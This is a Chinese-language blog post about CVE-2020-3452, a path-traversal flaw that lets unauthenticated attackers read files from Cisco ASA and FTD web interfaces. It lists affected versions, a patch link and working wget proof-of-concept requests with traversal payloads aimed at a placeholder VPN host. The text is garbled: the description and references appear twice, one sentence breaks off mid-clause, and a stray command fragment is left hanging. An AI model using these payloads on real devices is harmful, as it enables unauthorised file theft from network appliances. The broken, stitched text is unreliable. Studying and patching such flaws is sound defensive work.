CVE-2020-3452 CISCO ASA遠端任意檔案讀取漏洞
阿新 • • 發佈:2020-07-26
0x01 漏洞描述
Cisco官方 釋出了 Cisco ASA 軟體和 FTD 軟體的 Web 介面存在目錄遍歷導致任意檔案讀取 的風險通告,該漏洞編號為 CVE-2020-3452。 漏洞等級:中危。 通過shadon引擎的搜尋,目前全球大約有210,685個資產為
該漏洞目前僅影響啟用了AnyConnect或WebVPN配置的裝置,並且此漏洞不能用於訪問ASA或FTD系統檔案或底層作業系統(OS)檔案。
漏洞的驗證方式是可以讀取相關的檔案來驗證,如:
wget https://vpn.target.local:443/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ wget https://vpn.target.local:443/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua 這裡構造了資料包進行驗證。
參考連結https://twitter.com/aboul3la/status/1286809567989575685
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86
https://cert.360.cn/warning/detail?id=df808745e4d55c3847099a7048c8f86a
Cisco官方 釋出了 Cisco ASA 軟體和 FTD 軟體的 Web 介面存在目錄遍歷導致任意檔案讀取 的風險通告,該漏洞編號為 CVE-2020-3452。 漏洞等級:中危。 通過shadon引擎的搜尋,目前全球大約有210,685個資產為
該漏洞目前僅影響啟用了AnyConnect或WebVPN配置的裝置,並且此漏洞不能用於訪問ASA或FTD系統檔案或底層作業系統(OS)檔案。
0x02影響版本
- Cisco ASA:<= 9.6
- Cisco ASA:9.7 , 9.8 , 9.9 , 9.10 , 9.12 , 9.13 , 9.14
- Cisco FTD:6.2.2 , 6.2.3 , 6.3.0 , 6.4.0 , 6.5.0 , 6.6.0
0x03漏洞原理
Cisco Adaptive Security Appliance (ASA) 和 Cisco Firepower Threat Defense (FTD) 的 web 服務介面存在漏洞,允許未經身份驗證的遠端攻擊者向受影響的裝置傳送一個精心製作的HTTP請求,成功利用該漏洞的攻擊者能夠進行目錄遍歷攻擊並讀取目標系統上的敏感檔案。0x04漏洞復現
漏洞主要是可以通過介面構造特定請求來實現攻擊。漏洞的驗證方式是可以讀取相關的檔案來驗證,如:
wget https://vpn.target.local:443/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ wget
0x05漏洞修復
安裝Cisco ASA/TFD
最新補丁,進行補丁升級。具體可以參考:https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86參考連結https://twitter.com/aboul3la/status/1286809567989575685
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86
https://cert.360.cn/warning/detail?id=df808745e4d55c3847099a7048c8f86a